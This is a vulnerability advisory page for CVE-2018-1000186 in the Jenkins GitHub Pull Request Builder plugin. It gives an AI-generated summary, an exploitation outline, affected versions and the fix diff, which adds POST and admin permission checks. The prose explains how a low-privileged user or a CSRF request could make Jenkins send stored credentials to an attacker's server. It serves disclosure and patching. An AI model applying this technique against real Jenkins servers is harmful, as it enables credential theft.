CVE-2018-1000186
Description
Jenkins GitHub Pull Request Builder Plugin ≤1.41.0 exposes credentials by letting attackers with Overall/Read access connect to attacker-chosen URLs using stolen credential IDs.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Jenkins GitHub Pull Request Builder Plugin ≤1.41.0 exposes credentials by letting attackers with Overall/Read access connect to attacker-chosen URLs using stolen credential IDs.
Vulnerability
The Jenkins GitHub Pull Request Builder Plugin (ghprb-plugin) version 1.41.0 and older contains a sensitive information exposure vulnerability in GhprbGitHubAuth.java. The doFillCredentialsIdItems method, which is used for form validation to populate credential ID dropdowns, did not require any permission check beyond Overall/Read access. This allowed any user with that minimal permission to trigger a connection to an attacker-specified URL using attacker-specified credential IDs (obtained through another method). The method also did not require POST requests, making it additionally vulnerable to cross-site request forgery (CSRF) [1][2][3].
Exploitation
An attacker needs at least Overall/Read access to Jenkins and a way to obtain valid credential IDs (e.g., through another information disclosure or guessing). The attacker can craft a URL pointing to an attacker-controlled server and specify a credential ID. When a user with sufficient permissions accesses the crafted request (or via CSRF), Jenkins connects to the attacker-specified URL using those credentials, effectively sending the credentials to the attacker's server [2][3]. The attack does not require any special network position apart from being able to deliver the malicious request to a Jenkins instance [2].
Impact
Successful exploitation allows the attacker to capture credentials stored in Jenkins. The impact is exposure of sensitive information (credentials), which could be used to gain further unauthorized access to external systems (e.g., GitHub) or privilege escalation within Jenkins depending on the captured credentials [2][3]. The CVSS score is medium (4.3) as per the advisory [2].
Mitigation
The vulnerability is fixed in version 1.42.0 of the GitHub Pull Request Builder Plugin [4]. The fix adds @POST annotation to require POST requests, adds permission checks (Jenkins.ADMINISTER), and removes an exception declaration [4]. The plugin is deprecated and replaced by the GitHub Branch Source Plugin; users are strongly advised to migrate [1]. No workarounds are provided for unpatched versions. No known exploitation in the wild (KEV) listing is available.
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.jenkins-ci.plugins:ghprbMaven | < 1.42.0 | 1.42.0 |
Affected products
1Patches
11 file changed · +17 −7
src/main/java/org/jenkinsci/plugins/ghprb/GhprbGitHubAuth.java+17 −7 modified@@ -18,6 +18,7 @@ import hudson.util.FormValidation; import hudson.util.ListBoxModel; import hudson.util.Secret; +import jenkins.model.Jenkins; import org.apache.commons.codec.binary.Hex; import org.apache.commons.lang.StringUtils; import org.jenkinsci.plugins.plaincredentials.StringCredentials; @@ -32,11 +33,11 @@ import org.kohsuke.stapler.DataBoundConstructor; import org.kohsuke.stapler.QueryParameter; import org.kohsuke.stapler.export.Exported; +import org.kohsuke.stapler.verb.POST; import javax.crypto.Mac; import javax.crypto.spec.SecretKeySpec; import java.io.IOException; -import java.net.URISyntaxException; import java.nio.charset.Charset; import java.util.ArrayList; import java.util.Arrays; @@ -57,7 +58,7 @@ public class GhprbGitHubAuth extends AbstractDescribableImpl<GhprbGitHubAuth> { private static final int SHA1_PREFIX_LENGTH = 5; - static final int INITIAL_CAPACITY = 3; + private static final int INITIAL_CAPACITY = 3; private final String serverAPIUrl; @@ -241,16 +242,15 @@ public String getDisplayName() { * @param serverAPIUrl the github api server url. * @param credentialsId the credentialsId from the credentials plugin * @return list box model. - * @throws URISyntaxException If the url is bad */ public ListBoxModel doFillCredentialsIdItems( @AncestorInPath Item context, @QueryParameter String serverAPIUrl, @QueryParameter String credentialsId - ) throws URISyntaxException { + ) { List<DomainRequirement> domainRequirements = URIRequirementBuilder.fromUri(serverAPIUrl).build(); - List<CredentialsMatcher> matchers = new ArrayList<CredentialsMatcher>(INITIAL_CAPACITY); + List<CredentialsMatcher> matchers = new ArrayList<>(INITIAL_CAPACITY); if (!StringUtils.isEmpty(credentialsId)) { matchers.add(0, CredentialsMatchers.withId(credentialsId)); } @@ -273,14 +273,16 @@ public ListBoxModel doFillCredentialsIdItems( ); } - + @POST public FormValidation doCreateApiToken( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId, @QueryParameter("username") final String username, @QueryParameter("password") final String password) { try { + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + GitHubBuilder builder = new GitHubBuilder() .withEndpoint(serverAPIUrl) .withConnector(new HttpConnectorWithJenkinsProxy()); @@ -326,10 +328,14 @@ public FormValidation doCheckServerAPIUrl(@QueryParameter String value) { return FormValidation.warning("GitHub API URI is \"https://api.github.com\". GitHub Enterprise API URL ends with \"/api/v3\""); } + @POST public FormValidation doCheckRepoAccess( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId, @QueryParameter("repo") final String repo) { + + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + try { GitHubBuilder builder = getBuilder(null, serverAPIUrl, credentialsId); if (builder == null) { @@ -339,7 +345,7 @@ public FormValidation doCheckRepoAccess( GHRepository repository = gh.getRepository(repo); StringBuilder sb = new StringBuilder(); sb.append("User has access to: "); - List<String> permissions = new ArrayList<String>(INITIAL_CAPACITY); + List<String> permissions = new ArrayList<>(INITIAL_CAPACITY); if (repository.hasAdminAccess()) { permissions.add("Admin"); } @@ -357,9 +363,13 @@ public FormValidation doCheckRepoAccess( } } + @POST public FormValidation doTestGithubAccess( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId) { + + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + try { GitHubBuilder builder = getBuilder(null, serverAPIUrl, credentialsId); if (builder == null) {
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-92rv-mvmj-47qhghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2018-1000186ghsaADVISORY
- github.com/jenkinsci/ghprb-plugin/commit/e78ee24f7056b8507992ef17a9bb74a1a31d8c11ghsaWEB
- jenkins.io/security/advisory/2018-06-04/ghsax_refsource_CONFIRMWEB
- mvnrepository.com/artifact/org.jenkins-ci.plugins/ghprbghsaWEB
News mentions
0No linked articles in our index yet.